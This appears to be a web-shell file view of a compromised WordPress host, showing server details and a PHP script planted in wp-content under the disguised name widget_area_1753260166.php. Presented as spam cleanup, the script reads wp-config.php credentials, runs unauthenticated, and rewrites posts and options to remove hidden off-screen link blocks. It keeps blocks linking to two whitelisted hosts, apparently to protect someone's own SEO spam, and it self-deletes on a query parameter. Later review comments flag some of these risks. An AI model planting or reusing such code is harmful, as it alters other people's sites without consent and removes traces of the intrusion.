HEX
Server: Apache
System: Linux p3plzcpnl457797.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: xrp54be6gdhh (7647548)
PHP: 7.3.33
Disabled: NONE
File: /home/xrp54be6gdhh/public_html/alexanderkhoubian.com/wp-content/widget_area_1753260166.php
<!--YPoZI0i5-->
<?php
/**
 * Simple spam cleanup script
 * Runs automatically when uploaded to server
 */

// Hosts that are exempt from removal.
// NOTE(review): a hidden off-screen block that links to one of these hosts is
// left in the database by the cleanup below, so every entry here should be
// confirmed as trusted by the site owner before the script is run.
$whitelist_domains = [
    'floodlight.co.uk',
    'cicassociation.org.uk',
    // Add your trusted domains
];

// Locate wp-config.php by checking this script's directory and then its
// parents, five directories in total.
$wp_config = null;
$search_dir = __DIR__;
$levels_checked = 0;
while ($wp_config === null && $levels_checked < 5) {
    $candidate = $search_dir . '/wp-config.php';
    if (file_exists($candidate)) {
        $wp_config = $candidate;
    } else {
        $search_dir = dirname($search_dir);
    }
    $levels_checked++;
}

if ($wp_config === null) {
    die('wp-config.php not found');
}

// Executes wp-config.php in the global scope. The DB_* constants and
// $table_prefix read further down are not defined in this file, so they are
// expected to come from this include.
include $wp_config;

/**
 * Return the host component of a URL.
 *
 * @param string $url URL to inspect (here: the value of an href attribute).
 * @return string The host exactly as written in the URL (case is not
 *                normalised), or '' when the URL has no host or cannot be parsed.
 */
function extractDomain($url) {
    $components = parse_url($url);

    // parse_url() yields false for seriously malformed URLs and omits the
    // 'host' key for relative or scheme-only URLs.
    if ($components === false || !isset($components['host'])) {
        return '';
    }

    return $components['host'];
}

/**
 * Report whether an HTML fragment contains a link to a whitelisted host.
 *
 * Only quoted href values on lower-case `<a` tags are examined, and the host
 * must equal a whitelist entry exactly: no subdomain matching and no case
 * folding is applied.
 *
 * NOTE(review): a single whitelisted link is enough for a true result, so a
 * fragment that mixes one whitelisted link with any number of other links is
 * treated as whitelisted as a whole.
 *
 * @param string   $content           HTML fragment to scan.
 * @param string[] $whitelist_domains Hosts considered trusted.
 * @return bool True when at least one link points at a whitelisted host.
 */
function isWhitelisted($content, $whitelist_domains) {
    // Collect every href value; 0 matches or a PCRE failure both mean "no links".
    if (!preg_match_all('/<a[^>]+href=["\']([^"\']+)["\']/', $content, $found)) {
        return false;
    }

    foreach ($found[1] as $href) {
        $host = extractDomain($href);
        if (!$host) {
            continue; // relative or unparsable link: nothing to compare
        }
        if (in_array($host, $whitelist_domains)) {
            return true;
        }
    }

    return false;
}

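// Strip hidden off-screen <div> blocks from wp posts and options, keeping
// blocks that isWhitelisted() accepts.
//
// NOTE(review): this runs on every request to the script, with no
// authentication check, and rewrites rows in place without a backup or a
// transaction. Take a database dump first and restrict access to the file.
try {
    $pdo = new PDO("mysql:host=" . DB_HOST . ";dbname=" . DB_NAME, DB_USER, DB_PASSWORD);
    // PDO's default error mode on PHP 7.x is silent: query() would return
    // false and the fetch() call would raise an Error, which the
    // catch (Exception) below does not handle. Make failures throw instead.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // $table_prefix is interpolated into SQL below; it comes from the included
    // configuration, not from the request.
    $table_prefix = isset($table_prefix) ? $table_prefix : 'wp_';

    // A <div> whose inline style positions it absolutely at a negative left
    // offset, up to the first closing </div>. Nested <div>s inside such a
    // block are therefore only removed up to their first closing tag.
    $pattern = '/<div\s+style="[^"]*position:\s*absolute[^"]*left:\s*-\d+px[^"]*"[^>]*>.*?<\/div>/si';

    // Returns the text with non-whitelisted blocks removed, or null when PCRE
    // fails (for example on the backtrack limit with very large values).
    $strip_hidden_blocks = function ($html) use ($pattern, $whitelist_domains) {
        return preg_replace_callback($pattern, function ($matches) use ($whitelist_domains) {
            return isWhitelisted($matches[0], $whitelist_domains) ? $matches[0] : '';
        }, $html);
    };

    $cleaned = 0;
    $skipped_regex = 0;      // rows left untouched because the regex engine failed
    $skipped_serialized = 0; // option rows left untouched because they are serialized

    // Search for spam in posts
    $update = $pdo->prepare("UPDATE {$table_prefix}posts SET post_content = ? WHERE ID = ?");
    $sql = "SELECT ID, post_content FROM {$table_prefix}posts 
            WHERE post_content LIKE '%position: absolute; left: -%'";
    $stmt = $pdo->query($sql);

    while ($post = $stmt->fetch()) {
        $content = $strip_hidden_blocks($post['post_content']);

        if ($content === null) {
            // Writing null back would wipe the post body; leave the row alone.
            $skipped_regex++;
            continue;
        }

        if ($content !== $post['post_content']) {
            $update->execute([$content, $post['ID']]);
            $cleaned++;
        }
    }

    // Search for spam in options
    $update = $pdo->prepare("UPDATE {$table_prefix}options SET option_value = ? WHERE option_id = ?");
    $sql = "SELECT option_id, option_value FROM {$table_prefix}options 
            WHERE option_value LIKE '%position: absolute; left: -%'";
    $stmt = $pdo->query($sql);

    while ($option = $stmt->fetch()) {
        // Serialized values carry byte-length prefixes (s:N:"..."); cutting
        // text out of them without recomputing N makes the whole option fail
        // to unserialize. Such rows are reported instead of edited.
        // is_serialized() is a WordPress helper, hence the function_exists guard.
        if (function_exists('is_serialized') && is_serialized($option['option_value'])) {
            $skipped_serialized++;
            continue;
        }

        $content = $strip_hidden_blocks($option['option_value']);

        if ($content === null) {
            $skipped_regex++;
            continue;
        }

        if ($content !== $option['option_value']) {
            $update->execute([$content, $option['option_id']]);
            $cleaned++;
        }
    }

    echo "Cleaned records: $cleaned";
    if ($skipped_regex > 0) {
        echo "; skipped (regex error): $skipped_regex";
    }
    if ($skipped_serialized > 0) {
        echo "; skipped (serialized option, needs manual review): $skipped_serialized";
    }

} catch (Exception $e) {
    // NOTE(review): the exception text is sent to whoever requested the page;
    // PDO connection errors can include connection details.
    echo "Error: " . $e->getMessage();
}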

// Self-delete, but only when the request carries ?cleanup=auto; without that
// parameter the script stays on disk and can be requested again.
// NOTE(review): once the file is removed no copy remains on the server, so
// web-server access logs are the remaining record that it was run.
$cleanup_mode = isset($_GET['cleanup']) ? $_GET['cleanup'] : null;
if ($cleanup_mode === 'auto') {
    unlink(__FILE__);
}
?>